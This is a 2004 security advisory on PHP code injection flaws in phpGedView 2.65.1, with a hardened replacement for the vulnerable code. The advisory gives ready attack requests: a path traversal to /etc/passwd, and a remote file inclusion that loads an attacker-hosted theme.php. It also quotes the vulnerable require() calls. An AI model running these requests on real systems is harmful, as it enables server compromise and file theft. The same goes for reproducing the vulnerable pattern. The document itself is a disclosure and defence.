PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior
################################################################################
Summary :
phpGedView is an open source system for viewing GEDCOM information (family tree
and genealogy data) online. Multiple PHP code injection vulnerabilities exist in
the phpGedView product. They enable a malicious user to access arbitrary files or
execute commands on the server.
################################################################################
Details :
Multiple PHP scripts can be exploited to perform PHP code injection.
Vulnerable Systems:
* phpGedView version 2.65.1 and prior
Release Date :
January 30, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - PHP Injection or arbitrary file access
(HIGH risk, but the user must be Admin)
-- HTTP Request --
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd
-- HTTP Request --
Code impacted : editconfig_gedcom.php (lines 61-66)
if (empty($gedcom_config)) {
    if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
    else $gedcom_config = "config_gedcom.php";
}

require($gedcom_config);
Both the GET and POST requests work even if PHP register_globals is Off.
-------------------------------------------
II - PHP Injection
(HIGH risk, no authentication needed)
-- HTTP Request --
http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
-- HTTP Request --
Code impacted : [GED_File]_conf.php (lines 123-127)
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
else {
    $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
    require($THEME_DIR."theme.php");
}
The require call is only vulnerable when PHP register_globals is On.
In this case the name of the GEDCOM file in use has to be obtained. A request to
http://[target]/session.php reveals it: the GEDCOM file name appears as an
argument of the login.php call.
The attacker has to create on his web site a directory called themes/standard
containing a file theme.php.
For example: theme.php = <?php print "<?php phpinfo();?>" ;?>
The request then executes the phpinfo() command on the vulnerable target.
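As an added example, not phpGedView's own code and not the fix shipped in 2.65.2, a hardened replacement for the two require() patterns quoted in sections I and II. It assumes the config_*.php files and the themes/ tree live under the script's own directory, and substitutes a hypothetical `theme` request parameter for the request-controlled $PGV_BASE_DIRECTORY and $THEME_DIR globals.

```php
<?php
// Added example, not phpGedView's own code: hardened replacements for the
// require() calls quoted in sections I and II. Assumes (hypothetically) that
// config_*.php files and the themes/ tree live under this script's directory.

define('PGV_ROOT', __DIR__ . DIRECTORY_SEPARATOR);

// Resolve a request-supplied name to a file that must exist inside $base_dir.
// Returns the canonical path, or null if the name fails the allow-list pattern
// (which excludes "../", "http://" and NUL bytes) or resolves outside $base_dir.
function resolve_local_file(string $base_dir, string $name, string $pattern): ?string
{
    if (!preg_match($pattern, $name)) {
        return null;
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . $name);
    if ($base === false || $path === false) {
        return null;                         // base dir or file does not exist locally
    }
    // realpath() has already resolved symlinks and "..", so a prefix check is sound.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                         // escaped the directory
    }
    return $path;
}

// Section I: take the config name from POST only (never from GET or
// register_globals) and accept only bare "config_<name>.php" file names.
$gedcom_config = $_POST['gedcom_config'] ?? 'config_gedcom.php';
$config_path   = resolve_local_file(PGV_ROOT, $gedcom_config, '/^config_[A-Za-z0-9_-]+\.php\z/');
if ($config_path === null) {
    http_response_code(400);
    exit('invalid gedcom_config');
}
require $config_path;

// Section II: the theme is chosen by a short name under the local themes/
// directory; $PGV_BASE_DIRECTORY and $THEME_DIR are never read from the request,
// so remote URLs and directory traversal cannot reach require().
$theme      = $_GET['theme'] ?? 'standard';
$theme_path = resolve_local_file(PGV_ROOT . 'themes' . DIRECTORY_SEPARATOR,
                                 $theme . '/theme.php', '#^[A-Za-z0-9_-]+/theme\.php\z#');
if ($theme_path === null) {
    $theme_path = PGV_ROOT . 'themes/standard/theme.php';   // safe built-in fallback
}
require $theme_path;
```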
################################################################################
Vendor Status :
The information has been provided to John Finlay, the PhpGedView Project Manager.
A new release, 2.65.2, with fixes for these vulnerabilities is available.
--> http://phpgedview.sourceforge.net/
--> http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< [email protected] >